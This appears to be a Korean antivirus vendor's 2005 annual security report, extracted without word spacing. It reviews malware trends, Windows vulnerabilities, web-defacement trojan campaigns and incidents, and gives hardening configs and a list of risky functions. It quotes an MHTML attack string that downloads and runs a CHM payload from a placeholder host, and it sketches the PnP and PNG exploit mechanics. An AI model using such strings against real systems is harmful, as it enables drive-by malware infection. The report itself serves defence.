3국은특히나그의미가뜻깊은해였다. 매년광복절을즈음하여중국은일본의침략전쟁을성토한다는뜻에서사이버공격을시도하였으나 2005년의경우종전 60주년을기념하여계획적으로일본에대한사이버공격을준비한것으로알려졌다. 이계획은최초 7월중순경중국언론을통해서알려지기시작하였으며 8월초에는한국에도알려지기시작했다. 이번일본에대한사이버공격은중국의대표적인해커그룹인홍커 (HongKe) 에의해계획되었다. 알려진바에따르면 2005년의사이버공격은홍커의리더인라이언의주도가아니라다른리더들의주도하에 4만명이참가하는것으로알려졌다. 공격방법도공격조와정보수집조로나누어정보수집조에의해서후소사등일본내반중사이트를대상으로취약한부분을검색하는것으로시작하는것이었다. 특히이들이사용할공격방법중하나가한국의대학 3곳과온라인게임업체의시스템을공격의거점으로활용할것으로알려져한국내에서도많은우려가있었다. 그러나실제공격수준은미비한것이었다. 일본언론의보도에따르면 8월 15일을전후하여몇차례분산서비스거부공격 (DDoS) 이있었으나일본내시스템을마비시킬수준은아니었으며심각한해킹시도나사이버공격은없었던것으로밝혀져, 8월 15일중국의일본에대한사이버공격은하나의해프닝으로그쳤다.

33 III. 2005 년세계악성코드동향 3. 세계의악성코드동향 차민석주임연구원 (jackycha@ahnlab.com) 2 http://www.wildlist.org 2005년에등장한악성코드는최소 3만개이상이며, 스파이웨어로분류될수있는애드웨어등을포함할경우 4만개이상될것으로추정된다. 이는전세계적으로하루에 100개이상의새로운악성코드가보고되고있음을뜻한다. 와일드리스트에따르면2 2개이상의지역에서활동이보고된악성코드는대략 600 개에서 700개정도이며, 1개지역에서만보고된악성코드는 3,000개에서 4,000 정도로, 이는 2004년과비교해 2, 3배이상증가한수치이다. 와일드리스트는한달동안지속적으로보고된악성코드가집계되므로, 짧은시간에잠깐확산되고사라져집계되지않은악성코드수는더많을것으로보인다. 1개지역에서보고된악성코드의수가크게증가한것은상대적으로국지성을띤악성아이알씨봇, 트로이목마, 스파이웨어의수가폭발적으로증가했기때문으로보인다. 자체전파능력이없는트로이목마는전파경로가사람이직접개입되는메일이나메신저전송, 다운로드, 웹사이트방문등으로지역적특성을가질수밖에없다. 3 http://www.sophos.com/ pressoffice/news/articles/2005/12/ toptensummary05.html 4 http://www.virus-radar.com/ stat_01_current/ index_c12m_enu.html 백신업체의 2005년통계를보면 1년동안지속적으로보고된악성코드는주로메일로전파되는악성코드이다. 영국의소포스 (Sophos) 에따르면3 2005년에많은피해를입힌악성코드 1위는자피웜변형이다. 자피웜변형은헝가리에서만들어졌으며주로유럽지역에서널리보고되었다. 소버웜변형들은 3위와 4위를차지하고있다. 소버웜변형은 11월에발견되었음에도높은순위를차지한것으로보아짧은시간에확산이많이되었음을알수있다. 11월에등장한소버웜변형은기존변형과달리한글윈도우환경에서도동작해국내에서도보고가많았다. 슬로바키아의에셋 (Eset) 의메일에대한악성코드 1년통계에따르면4 피해가가장많았던것은피싱메일이다. 그러나피싱메일은악성코드와는성격이다소다르므로 2위인소버웜변형이실제1위라고볼수있다. 다른유럽업체들과유사하게넷스카이웜, 자피웜이순위를차지하고있다. 2005년의악성코드통계를보면지역별차이가있지만소버웜변형, 넷스카이웜변형이전세계적으로많이보고되었다. 마이톱웜변형들역시상위순위에있지만많은변형이출몰해대부분짧은시간에퍼지고소멸된것으로보인다. 자피웜변형의경우유럽지역에서 1,2위를다투지만아시아지역에서는순위권밖에있다. ASEC

IV. 2005 년시큐리티동향 작성자 : 김지훈주임연구원 (smallj@ahnlab.com) 마이크로소프트보안패치발표동향마이크로소프트사 ( 이하 MS) 는 2005년한해동안긴급29건, 중요 18건, 보통 8건등총55건의보안패치를발표하였다. 2005년은 2004년과다름없이 MS 윈도우취약점의악성코드이용도가높았던한해였다. 트로이목마유포를위해중국발웹해킹에이용된 MS04-013과 MS05-001 취약점, MS05-039 PnP 취약점을이용하는조톱웜 (Win32/Zotob.worm) 과악성아이알씨봇웜, 그리고악의적으로조작된이미지파일을핸들링하는과정의취약점을이용하는 MS05-002, MS05-009, MS05-053 등이악성코드에서이용되었다. 하지만, 2004년출현한새서웜 (Win32/Sasser. worm) 과같이윈도우취약점을이용해전세계적인대규모피해를가져온악성코드는 2005년에는출현하지않았다. Moderate 15% Important 33% Critical 52% [ 그림 1] 2005 년발표된 MS 보안패치위험등급분포현황 12 10 8 6 4 2 0 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 [ 그림 2] 2005 년발표된 MS 보안패치월별분포현황 2005 년에악성코드에서사용된윈도우주요취약점을나열해보면다음과같다.

35 IV. 2005 년시큐리티동향 MHTML URL 처리취약점 (MS04-013) 중국발웹해킹에서사용하는가장일반적인형태로, 아래와같은공격코드를이용하여특정웹사이트로부터악의적인 CHM 파일을다운로드한후, 그안에포함된악성코드를실행하게된다. mk:@msitstore:mhtml:c:\.mht!http://malserver/malware.chm::/%23.exe HTML 도움말의취약점 (MS05-001) HTML 도움말 ActiveX 컨트롤에정보공개나원격코드실행을허용하는도메인간취약점을이용한다. 이취약점을이용하여악의적의웹사이트운영자가방문자의로컬시스템내의악의적인파일을실행하게된다. 실제공격코드에서는 Cross-Site Scripting (XSS) 공격을통해원격서버로부터악성코드를다운로드한후실행하게된다. 커서및아이콘형식처리의취약점 (MS05-002) USER32.dll 라이브러리가악의적인 ANI 커서파일을핸들링하는과정에서변수길이를제대로체크하지않아발생한다. 일반적으로 36바이트길이의 AnimationHeaderBlock 필드길이를복사하는과정에서변수를체크하지않아취약점이존재하는것으로, 실제공격코드에서는특정웹서버에서악성코드를다운로드한후WinExec 명령어를통해쉘코드가실행되게된다. PNG 처리취약점 (MS05-009) PNG 파일포맷취약점은 IHDR, trns chunk를임의로조작하여이용하는것이다. IHDR chunk는 color type 을가지고있는데, 이취약점이용을위해서 color type의값을 0x03으로설정한후 trns chunk의데이터길이를 256 이상으로하여버퍼오버플로우를일으키게된다. 플러그앤플레이의취약점 (MS05-039) 플러그앤플레이 (PnP) 서비스의검사되지않은버퍼로인하여취약점이존재한다. 공개된공격코드는 TCP 445번으로접속하여 SMB 세션을맺고조작된악의적인패킷을보내임의의명령어를실행한다. 이때사용하는 UUID(Universal Unique Identifiers) 값은다음과같다. PnP UUID: 8d9f4e40-a03d-11ce-8f69-08003e30051b 접속에성공하게되면원격에서명령어실행창을띄울수가있다. 그래픽렌더링엔진의취약점 (MS05-053) 이취약점은 WMF, EMF 이미지형식의파일이렌더링될때발생할수있는것으로악의적인웹사이트방문을유도하거나, 특수하게조작된이미지를첨부하여메일을발송하는등다양한형태로사용자에게접근을유도하여공격에이용할수있다. MS05-053의보안패치에는 3가지의취약점이존재하며그래픽렌더링엔진과 WMF 파일에는원격코드의실행이가능하며 EMF 파일은 DoS 상태유발만가능하다.

36 IV. 2005 년시큐리티동향 취약점공격대상의다양화공격자가보안에취약한공격대상을찾는중요한이유가무엇인가. 자기과시등을목적으로했던과거양상과는달리금전적이익을노리는목적이일반적인대세이다. 공격자는목적달성을위해다수의시스템 ( 일명좀비 ) 을손쉽게확보하고조정할수있는공격방법이필요하다. 최근들어윈도우시스템의보안강도가점차강화되면서, 윈도우취약점을이용한공격이성공한다할지라도파급력이미미한편이기때문에, 공격자의욕구를충족시키기에는부족함이많을수밖에없다. 이러한이유로인해공격자의시선이운영체제로부터응용프로그램의취약점으로자연스럽게이동되고있다. Windows 812 건 Multiple 2,058 건 Unix/Unix 2,328 건 [ 그림 3] CERT 에보고된 2005 년도 OS 플랫폼별소프트웨어취약점현황 공격자가다수의피해시스템을확보하기위해공격대상을물색하는데중요한조건중하나가바로대중성이다. 우리인터넷환경하에서대다수의컴퓨터에설치되어있고, 가장빈번하게활용되는인터넷응용프로그램들의취약점들이공격대상으로활용되고있다. [ 그림4] 는보안전문업체인시큐니아 (Secunia) 가발표한 2003년에서 2005년도까지의브라우저취약점현황이다. 35 30 25 IE 6.x Firefox 1.x Opera 8.x 20 15 10 5 0 2003 년 2004 년 2005 년 [ 그림 4] 시큐니아에서발표한년도별브라우저취약점현황

37 IV. 2005 년시큐리티동향 2004년까지는웹브라우저의활용이인터넷익스플로러 ( 이하 IE) 에상당히의존적이었으나, 2005년부터모질라재단의파이어폭스가세계적으로 10% 이상의점유율을유지할정도로성장하였다. [ 그림4] 에서보면 2005년에는파이어폭스, 오페라등오픈소스브라우저의사용자층이확대되면서이들프로그램에대한보안취약점노출도함께증가하고있음을확인할수있다. 2006년에는 MS의 IE 7, 모질라재단의파이어폭스 2.0이공식출시됨에따라안전한브라우저시장의향방에귀추가주목되고있다. 또한, 보안 / 백업솔루션, 범용메신저프로그램등에대한취약점도다수보고되었다. 이프로그램들은기업자산의보호와비즈니스연속성, 기업내원활한커뮤니케이션지원을위해반드시필요한응용프로그램들이다. 따라서, 해당제품에대한취약점으로인해오히려기업내위협요소로돌변하는일이없도록제품취약점발표시신속한보안업데이트프로세스를마련해야한다. 1 웹서버해킹사고에대한자세한내용은본문서의 VI. 2005년 Key Issue-I 홈페이지변조를통한악성코드유포 에서자세하게다루기로한다. 웹서버해킹사고의급증 2005년주요홈페이지해킹사고는크게 2가지측면에서요약해볼수있다. 첫째로는금전적인이득을목적으로하는중국발웹해킹, 온라인개인정보유출, 피싱경유지이용등을꼽을수있으며, 둘째로는자기과시적, 민족주의적성향이표출된홈페이지변조사건등이이에해당될수있다. 웹서비스보호를위해 1차적인경계보안역할을수행하는기존의네트워크방화벽이외에도웹방화벽등의웹어플레이케이션보안제품도입, 보안업체의정기적인보안취약점점검서비스등을통해지속적으로웹서비스보안유지를위해노력해야할것이다.1 디지털사회로의진입과역기능에대한대처인터넷이용의확산으로수많은정보들이데이터베이스화되어인터넷상에저장되어있다. 이러한정보중일부가악의적인목적의공격자로인해혹은보안인식이결여된관리자의관리소홀을틈타무분별하게유출되는사건을보도매체를통해접할수있었다. 2005년에는연예인 X 파일유출, 신용카드및인터넷포털사이트의회원정보유출, 학원내수험생정보유출, 그리고위변조가능성으로인해전자정부의민원서류발급이일시중단되었던사건이발생했었다. 모든이용자에게신뢰받는안전한디지털사회로의진입을위해서는정보화사회의역기능-정보시스템해킹, 정보유출, 개인사생활침해, 청소년음란등-에대한예방과대책이함께마련되어야할것이다. ASEC

V. AhnLab 이바라본 2005 년보안사고 작성자 : 차민석주임연구원 (jackycha@ahnlab.com) 과거악성코드제작이나해킹은자신의실력을과시하려는사람들에의해이뤄졌다. 하지만, 2004년부터금전적이득을위해악성코드를제작하거나해킹을시도하는경향이나타났고 2005년보안사고의동기는 돈 임이뚜렷해졌다. 2005년국내외발생한주요보안사고를정리해보자. 1 머니투데이, 악성코드로게임아이템빼낸韓中해커단 덜미 http://www.moneytoday.co.kr/view /mtview.php?type=1&no=2005070 814171135475 1. 한국의보안사고 홈페이지변조를통한트로이목마유포 2005년 6월부터국내웹사이트가해킹되고메인페이지가변조되어트로이목마가배포되는사건이잦아졌다. 보안에상대적으로취약한중소사이트뿐아니라대형쇼핑몰, 언론사, 포털등많은웹사이트가표적이되었다. 국내에해킹이본격적으로시작되기전인 5월말일본의유명가격비교사이트가해킹되는사건이발생했는데, 일본의해당사이트는방어대책이완료되는약일주일간사이트를폐쇄하고운영을중지한다는기자회견을했다. 그에비해해킹당한국내사이트의대부분은근본적인해결보다는사실을숨기거나해킹되면다시복구하고또다시해킹당하는악순환을반복하는사이트가많았다. 홈페이지를변조하여트로이목마를유포하는전통적인수법은홈페이지를해킹하여메인페이지에 iframe 태그를이용해트로이목마가자동설치되는주소로접속하게하고, 접속하는사용자의시스템이보안패치가되지않아취약점을가진경우사용자컴퓨터에트로이목마가설치되는방법이다. 이렇게유포된트로이목마는대부분특정온라인게임의아이디와비밀번호를알아내특정주소로메일을발생하는형태이며, 이외에도국내주요사이트의아이디와비밀번호를훔쳐가는형태도존재하였다. 이렇게수집된정보의수신인은대부분중국계정이어서홈페이지변조를통한트로이목마유포가중국해커들의소행으로의심되었었다. 그런데, 이를반증하듯 7월에는중국해커들과연결하여사용자들로부터훔친게임아이템과사이버머니를국내에되팔아 2억대의부당이득을챙긴범죄조직이검거되기도하였다.1 하지만, 이들의검거이후에도해킹은줄어들지않고있어유사조직은더많은것으로추정되며, 이런상황이지속될경우우리나라온라인게임에대한불신으로이어져온라인게임산업에도영향을줄수있을것으로보인다. 2 연합뉴스, 은행인터넷뱅킹첫해킹당해거액빠져나가 http://news.naver.com/news/read. php?mode=lod&office_id=001& article_id=0001019113&section_id =001&menu_id=001 인터넷뱅킹보안문제국내은행권에인터넷뱅킹이도입된것은외환위기이후이며이후급격한이용자증가로국내인터넷뱅킹이용자는 2,427 만명에달한다고한다. 인터넷뱅킹이용자의증가와함께인터넷뱅킹을이용한금융사고도 2005년에는몇차례발생했다. 6월초에는시중에서쉽게구할수있는백도어를이용해인터넷뱅킹에서돈을인출한사건이있었다.2 인터넷뱅킹도안심할수없다는점에서충격이컸지만해킹혐의자는해킹전문가도아니며사용된백도어도기존백신에서진단되는프로그램으로,

39 V. AhnLab 이바라본 2005 년보안사고 피해자가평소백신과은행에서제공하는보안프로그램만사용했어도피해를막을수있었다는점에서사용자들의보안의식의현주소를볼수있었던사건이었다. 이후방송을통해인터넷뱅킹이키로거프로그램에취약하다는내용이언론에알려지고국내모은행과유사하게꾸민가짜사이트를통해백도어프로그램을배포한사건이발생하면서인터넷뱅킹의안전성에의문이증가되었다. 하지만, 아무리견고한보안도운영하는사람의부주의로뚫릴수있으며보안이강화되면이용자들의불편이커지므로, 서비스제공자인은행은사용자의불편함과보안이라는두마리토끼를잡아야하는숙제를가지고있다. 815 중국해커공격설 일본고이즈미총리의야스쿠니신사참배와역사왜곡논란교과서문제로반일감정이어느때보다높은2005년 8월 15일이었다. 8월 15일중국해커들이일본사이트총공격을예고하고중간경유지로우리나라의시스템이거점으로이용될지모른다는우려가생겼다. 중국해커일본공격설에보안업계와정부는긴장했지만다행히아무일없이끝났다. 하지만, 일부언론에서는지나치게과장되거나사이버전쟁과같은지나치게자극적인용어를사용하기도했다. 인터넷공문서위변조위험논란 2005년국정감사에서인터넷에서발급되는각종민원서류가쉽게위변조될수있다는사실이확인되면서 2005년 9월 28일부터인터넷민원증명발급서비스를중단하였다. 하지만, 인터넷민원서류의위변조행위는인터넷민원증명발급시스템의문제라기보다진위여부확인절차상의문제가더문제였던것으로, 인터넷민원서류에는이미위변조를식별할수있는각종보안장치들이마련되어있었다.3 결국이사건역시보안시스템과함께이를운영하는사람의철저한보안의식이중요함을일깨워준사례이다.4 3 머니투데이, 인터넷민원서류, 허술한유통구조가더문제 http://www.moneytoday.co.kr/view /mtview.php?type=1&no=2005092 816534687744 4 연합뉴스, 국세청인터넷민원증명발급서비스재개 http://news.naver.com/news/read. php?mode=lsd&office_id=098&a rticle_id=0000087692&section_id= 117&menu_id=117 5 inews24, 스파이웨어기준및피해방지요령 http://www.inews24.com/php/new s_view.php?g_serial=167564&g_m enu=020100 6 Anti-Spyware Coalition, Anti- Spyware Coalition Definitions and SupportingDocuments http://www.antispywarecoalition.or g/documents/definitions.htm 스파이웨어분류제정 2004년부터스파이웨어가유행하면서무엇이스파이웨어인가에대한논란도증가했다. 사실업체마다다른스파이웨어기준으로다른안티스파이웨어제품을진단하는상황도발생하면서스파이웨어기준에대해안티스파이웨어제작업체와스파이웨어로분류된업체간에논쟁이가열되기도하였다. 이에정통부에서스파이웨어기준을발표했으며5 해외에서도 Anti-Spyware Coalition을통해스파이웨어정의가만들어졌다.6 하지만, 스파이웨어의범위가넓어지고있으며이들분류에해당되지않는프로그램에대한스파이웨어여부논쟁은앞으로도계속될것으로예상된다. 스파이웨어는프로그램의행동만큼어떻게설치되었으며사용자가인지할수있느냐가중요한판단의요인이기때문이다.

40 V. AhnLab 이바라본 2005 년보안사고 2. 세계의보안사고 애드웨어와악성코드의결합애드웨어제작으로큰돈을번기업이나타나면서애드웨어제작사업은괜찮은사업으로인식되었다. 하지만, 애드웨어업체입장에서는애드웨어를퇴치하는안티스파이웨어업체와끝없는숨바꼭질을해야했다. 상당수안티스파이웨어제품이파일이름으로검사하는방식을많이사용하므로파일이름을임의로변경해진단을어렵게하고다른파일을감염시키는바이러스형태의애드웨어도제작했다.7 애드웨어제작업체는더많은수익을위해협력업체를고용하여애드웨어를배포하기시작했다. 애드웨어배포수에따라배당을받는형태로운영되면서악성코드제작자들이웜을제작해애드웨어를퍼뜨리는일이잦아졌다. 가장대표적인예가 2005년초에국내에널리퍼진브로피아웜 (Win32/Bropia.worm) 과켈비르웜 (Win32/Kelvir.worm) 이다. 2004년부터큰문제가된악성아이알씨봇류도과거특정사이트공격에서사용자모르게애드웨어를배포하는형태가잦아졌다. 이들웜제작자는애드웨어제작업체이거나애드웨어배포를맡은배포자로보이며, 악성코드제작자와애드웨어업체간의검은거래는앞으로도계속될것으로보인다. 7 AhnLab, Dropper/Bube.8200 7 http://info.ahnlab.com/ smart2u/virus_detail_2088.html 가짜안티스파이웨어기승애드웨어로대표되는스파이웨어가기승을부리면서안티스파이웨어제품이대거등장했다. 이들중몇제품은레지스트리찌꺼기, 쿠키, 위험도가낮은링크파일을진단해사용자에게진단수를부풀린다는비판을받고있다. 뿐만아니라배포방식에서도기존의스파이웨어업체와유사한방식으로사용자몰래배포하여과금을요구해안티스파이웨어가스파이웨어라는사용자의불만이증가하고있다. 이렇듯가짜안티스파이웨어제품이기승을부리고있으므로사용자는신뢰할수있는회사의제품을사용해야할것이다. 백신엔진사고백신의오동작과오진은정상파일삭제나시스템충돌등치명적인문제를일으키기도한다. 따라서, 모든백신업체는제품과바이러스시그니처에대한테스트에만전을기하고있지만, 백신제품은다른소프트웨어보다잦은업데이트와신속성이중요하므로철저한검증이이뤄지지못한엔진에서문제가발생하는경우도있다. 2005년에는한백신업체에서제공한잘못된엔진으로고객사의시스템을정지시키는등큰피해를입혀, 해당백신업체경영진이이제품의사용이많은나라에직접방문해사과까지하는사건이발생했었다. 뿐만아니라국내의한백신제품도정상문서파일을파괴하는문제가발생하기도했다. 산업스파이가백도어이용해정보유출이스라엘에서주요기업고위경영자들의컴퓨터에트로이목마를보낸산업스파이행위가적발되었다. 과거산업스파이는해당업체에몰래침투해회사기밀을빼내는형태가일반적이었지만주요자료가컴퓨터에보관되는현재이제산업스파이도해킹이나백도어를통해원격지에서은밀히회사주요기밀을유출될수있다는점에서보안의중요성을일깨워준사건으로보인다.

41 V. AhnLab 이바라본 2005 년보안사고 법정다툼에오른스파이웨어논쟁악성코드제작은불법이며대부분개인에의해이뤄지므로백신업체에소송을거는경우는없다. 하지만, 스파이웨어는대부분소프트웨어업체에서만들어지며해당업체의제품을스파웨어로진단할경우법정다툼까지가는경우도잦다. 한국에서안철수연구소는스파이웨어증상을가진모한글키워드서비스업체의특정모듈을진단했고이에해당업체는소송을걸어현재재판중이고, 영국회사인레트로코더 (RetroCoder) 는썬벨트소프트웨어 (Sunbelt Software) 측에법적소송을걸겠다고위협하고있다.8 미국의시만텍측은뉴욕의한인터넷회사가제공하고있는툴바와애드웨어공방을벌이고있다. 현재도많은안티스파이웨어업체는자신들을스파이웨어로분류한업체들로부터이의제기를받고있으며일부는법적공방까지가고있다. 현재스파이웨어정의가마련되었지만적용을두고안티스파이웨어업체와스파이웨어제작혐의를받고있는업체간법정다툼은잦아질것으로보인다. 8 ZDNet Korea, 스파이웨어 vs 보안업체누구손을들어주나? 6 http://www.zdnet.co.kr/news/ network/security/0,39031117, 39141281,00.htm 9 AhnLab, Win-Trojan/Breplibot 9 http://info.ahnlab.com/ smart2u/virus_detail_2948.html 10 KOTRA, MS사바이러스백신시장진출본격화 http://www.kotra.or.kr/main/trade/ cmdt/view_n.jsp?lsmcd=0030001 &inpt_no=1187623 Sony DRM 스파이웨어논쟁소니 BMG가불법복제를방지하기위해일부음반 CD에채택한 DRM 관련프로그램이스파이웨어논쟁에휩싸인일이발생했다. 이 DRM 프로그램은사용자와시스템으로부터자신을숨기는루트킷 (Rootkit) 기능을채택하고프로그램동작이투명하지못해스파이웨어논란에휩싸인것이다. 특히응용프로그램이자신의존재를숨기는것뿐아니라이음악 CD를구입한소비자조차해당프로그램이자신의시스템에서수행되고있다는것을모르도록숨기고있어문제가되었다. 또한은폐되는파일이나정보등을다른악성코드가역이용하여자신의존재를쉽게숨길수도있다. 브레프리봇트로이목마 (Win-Trojan/Breplibot)9라고명명된악성코드가그좋은예이다. 소니 BMG의스파이웨어논쟁은프로그램행동의부적절성과함께사용자에게프로그램의동작을충분히인지시키지못하기때문에스파이웨어로분류되는데있다. 이에따라앞으로도사용자모르게은밀하게동작하는보안프로그램에대한스파이웨어논쟁은계속될것으로보인다. 마이크로소프트사바이러스백신시장진출본격화 2005년초마이크로소프트사는서버용바이러스백신소프트웨어제조업체인사이바리 (Sybari) 를인수했다. 이미 2003년루마니아의백신업체인 GeCAD사를인수했으며 2004년 12월에는스파이웨어제거프로그램업체인자이언트소프트웨어 (Giant Software) 도인수했다.10 이로써마이크로소프트사는클라이언트용안티바이러스제품과안티스파이웨어제품그리고서버용안티바이러스제품을보유하게되었다. 2005년말에는 2006년부터온라인상에서무료로악성코드를진단, 치료해주는무상보안서비스를제공하겠다는전략을발표했다. 향후마이크로소프트사는바이러스백신시장뿐아니라더다양한보안영역으로진출할것으로예상되며기존보안업계입장에서는잠재위협요소로작용할것으로보인다. 100 개가넘는모바일악성코드등장 최초모바일악성코드가등장한이후 2005년 11월까지 100개가넘는모바일악성코드가등장했다. 현재대부분심비안 OS를이용하는일부휴대폰에서만동작하지만휴

42 V. AhnLab 이바라본 2005 년보안사고 대폰기능이강력해지면서더욱다양한악성코드가등장할것으로보인다. 특히과거모바일악성코드는블루투스 (Bluetooth) 를통해근거리의사용자에게만전파되었지만 MMS나메모리카드등을통해전파되는악성코드도등장하고있다. 아직모바일악성코드는심각하지않지만점점문제가커지고있다. 이외휴대게임기용악성코드도 2005년에등장했다. 11 AhnLab, Win-Trojan/Exploit-WMF 11 http://info.ahnlab.com/ smart2u/virus_detail_3231.html [ 그림 1] 모바일악성코드의증가추이 ( 출처 : F-Secure) WMF 취약점 2005년 12월말 WMF 파일 ( 윈도우메타파일, Windows Metafile) 을조작해사용자의시스템에서사용자모르게명령을내릴수있는취약점이발견되었다. 익스플로잇-WMF 트로이목마 (Win-Trojan/Exploit-WMF)11로명명된이트로이목마들은이글을작성하는현재까지마이크로소프트사에서보안패치가제공되지않아제로데이공격 (Zeroday attack) 으로분류할수있다. 특히최초발견이후일주일동안 70 여개이상의취약점을이용한 WMF 파일이발견되고있으며국내에서홈페이지해킹후조작된 WMF 파일을숨겨둔사이트도발견되었다. [ 그림 2] WMF 파일다운로드를유도하도록해킹된홈페이지소스

43 V. AhnLab 이바라본 2005 년보안사고 3. 2006 년보안사고전망 2004년중반이후많은보안전문가들이악성코드와해킹이금전을추구하는방향으로바뀔것으로예상했다. 2005년은이런전망이현실로나타난해이며돈때문에발생한보안사고가급증했다. 2006년의보안사고도대부분금전적이득을목표로할것은분명하다. 왜냐하면대부분의컴퓨터가인터넷에연결되어있으며보안의식이부족하거나컴퓨터사용에익숙하지않는사용자들로부터아이디와비밀번호를빼내는것은너무나쉬워졌기때문이다. ASEC

2005 년 Key Issue I VI. 홈페이지변조를통한악성코드유포 작성자 : 이정형주임연구원 (jungh@ahnlab.com) 2005년 1월국내대량홈페이지변조사건을시작으로 9월에는일반사용자들이많이방문하는국내유명포털사이트뉴스페이지, 언론사홈페이지, 공공기관, 음원관련사이트등에대한해킹, 12월에는하루에수십만명이방문하는국내대형온라인서점까지해커에의해홈페이지가변조되어악성코드를배포하는등 2005년한해동안무차별적인국내홈페이지해킹사건들이줄을이었다. 이러한홈페이지변조공격은 1990년대후반부터증가추세에있으며, 최근에는악성코드의유포를통한개인정보수집이빈번하고있다. [ 그림 1] 해킹패턴의변천흐름 웹에대한이해 1990년대초에개발된 WWW(World Wide Web) 는인터넷사용을편리하게하여인터넷의대중화를가져오게하였고, 이는폭발적인이용자수의증가로이어져우리나라인터넷사용인구가 2005년 6월에총인구의 72% 인 3,257만명에육박하였다. 또한, 인터넷과 WWW(World Wide Web) 가동일시되고, W3C(www.w3c.org) 에서개발한 HTML 문서의사용이보편화되었다. 이렇듯인터넷보급이대중화되면서 해킹 이란단어가일반사용자들에게도익숙한단어가되었는데, 웹해킹이란일반적으로정보를제공해주는웹서버즉, HTTP 서버를공격하는것을일컫는다. [ 그림 2] 웹서버해킹구조

45 VI. 2005 년 Key Issue I - 홈페이지변조를통한악성코드유포 홈페이지변조와결합한악성코드해커는해당웹서버를공격하여웹페이지를인터넷익스플로러취약점을이용한트로이목마가설치되게변조해두고, 사용자들이해당웹페이지를방문하였을때트로이목마가사용자의시스템에설치되게한다. 1 AhnLab, PERL/Santy http://info.ahnlab.com/smart2u/ virus_detail_1613.html [ 그림 3] 홈페이지가변조되어악성코드주소가포함된 iframe 트로이목마는감염된시스템의사용자가특정온라인게임웹사이트를접속할경우사용자계정과비밀번호를후킹 (Hooking) 하여특정메일주소로전송을시도한다. 제작자는유출된사용자계정과비밀번호를이용하여해당계정이보유하고있는사이버머니또는아이템을이용해금전적이득을취득하기위해제작한것으로추정된다. 이러한증상을가진것으로는리니지핵트로이목마 (Win-Trojan/LineageHack), 행핵트로이목마 (Win-Trojan/HangHack) 등이있다. 이런공격을당한대다수의시스템은윈도우 NT 계열의웹서버이다. 웹서버는보안패치가되어있음에도불구하고, 대부분이 SQL 인젝션등의웹어플리케이션버그로인해공격당해인터넷익스플로러의취약점을이용하여트로이목마를설치하는것이다. 또한, 특정어플리케이션의취약점들을이용한웜이증가하고있는데, 2005년초에는구글, 야후등의검색엔진을통해 PHPBB를이용하는사이트를찾아낸후해당취약점을이용해전파되는산티웜 (Perl/Santy)1 등이맹위를떨치기도하였다. [ 그림 4] 산티웜에의해변조된홈페이지화면 홈페이지변조공격에대한방지기법웹해킹공격에대한방지기법은크게웹서버와웹어플리케이션의취약점그리고, 사용자클라이언트상의취약점으로크게나누어진다. 이제, 이들취약점들의종류와해결방법에대해알아보기로하자.

46 VI. 2005 년 Key Issue I - 홈페이지변조를통한악성코드유포 웹어플리케이션취약점및해결방법 웹어플리케이션취약점에는다음의 6가지의것이존재하며각취약점별해결방법은다음과같다. 1) 파일 upload 취약점웹어플리케이션에서파일업로드기능이구현되어있으면.php.ph, asp, jsp 등의스크립트파일을업로드한후악의적인명령어를실행하여웹서버권한을획득할수있게된다. 이러한스크립트의실행을방지하는기법에는파일이저장되는디렉토리에대해소스처리하는방법과파일업로드필드에대해서스크립트파일에대한업로드금지방법이있다. 아파치서버를사용하는경우, 설정파일인 httpd.conf 에다음의줄을추가하여방지할수있다. <DirectoryMatch "^/home/.*/data"> AddType application/x-httpd-php3-source.phps.php.ph.php3.cgi.sh.pl.html.htm.shtml.vbs.ins AddType application/x-httpd-php-source.phps.php.ph.php3.cgi.sh.pl.html.htm.shtml.vbs.ins <Files ~ ".*\.ph$"> Order allow,deny Deny from all </Files> </DirectoryMatch> IIS 서버에서는해당파일에대해 ACL(Access Control List) 를설정하거나, 가상디렉토리를생성하여다음과같이권한제어를설정한다..exe,.dll.cmd.pl.cgi,.asp 등에대한 Everyone(X), Administrators( 모든권한 ), System( 모든권한 ) 다음은웹어플리케이션에서프로그램구현으로스크립트의파일업로드를금지시키는예제이다. if(eregi("\.php",$file[name]) eregi("\.ph",$file[name]) eregi("\.asp",$file[name]) eregi("\.dll",$file[name]) eregi("\.cgi",$file[name]) eregi("\.exe",$file[name])) { echo "<script>\n". "alert('u attempted invalid method in this program!');\n". "history.back();\n". "</script>\n"; exit; }

47 VI. 2005 년 Key Issue I - 홈페이지변조를통한악성코드유포 2) 설정파일 (Setup file) 노출취약점웹어플리케이션은프로그램초기화나, 전역변수처리를담고있는설정파일들을가지고있다. 이러한설정파일들에대한접근제어를하지않으면웹을통해중요설정정보를볼수있게된다. 이를방지하기위해아파치서버를사용하는경우에는설정파일이 httpd.conf 에다음의줄을추가해주어야한다. AddType application/x-httpd-php.php.php3.ph.inc IIS 서버를사용하는경우에는해당파일에대하여 ACL(Access Control List) 를설정하거나, 가상디렉토리를생성하여, 다음과같이권한제어를설정한다. Everyone(X), Administrators( 모든권한 ), System( 모든권한 ) 3) Directory, File Permission, 기본설치파일관련취약점웹어플리케이션설치시 Directory 및해당 File에모든유저의쓰기권한이적용되는경우가존재한다. nobody를제외한유저들의쓰기권한을제거하고또한해당글이저장되는파일에대한 permission을검사하며, 백업파일을삭제하도록한다. IIS를사용하는경우 iissamples, iishelp, msadc, _vti_bin(frontpage Extension 관련 ), scripts, cgi-bin 등이필요하지않을경우이를삭제하고, 인터넷서비스관리자의속성에서.htr,.idc,.printer,.htw,.ida,.idq 등필요하지않은항목에대하여제거한다. 4) shell 실행및파일오픈관련함수취약점웹어플리케이션에서다음과같은함수를사용할경우메타캐릭터문자들을제거하지않으면변수인자에악의적인값을추가하여 shell 명령어들을실행하거나중요파일들을다운로드할수있게된다. system(), passthru(), exec(), popen(), escapeshellcmd(),` `(Backticks) 및 fopen(), include() 해결방법은이함수들을사용할때메타캐릭터문자인.<>* &;$!#()[]{}: /^\n\r 를제거하는것이다. 5) 버퍼오버플로우 (Buffer Overflow) 취약점웹어플리케이션프로그램에버퍼오버플로우가존재하면웹서버의권한을빼앗길수있다. 프로그램에서이러한종류의함수를사용할때버퍼크기에대한주의가필요하다. gets(), getenv(), strcpy(), strcat(), sprintf(), fscanf(), scanf(), sscanf(), vscanf(), vsscanf(), vfscanf(), vsprintf(), realpath(), getopt(), getopt_long(), getpass(), streadd(), strecpy(), strtrns()

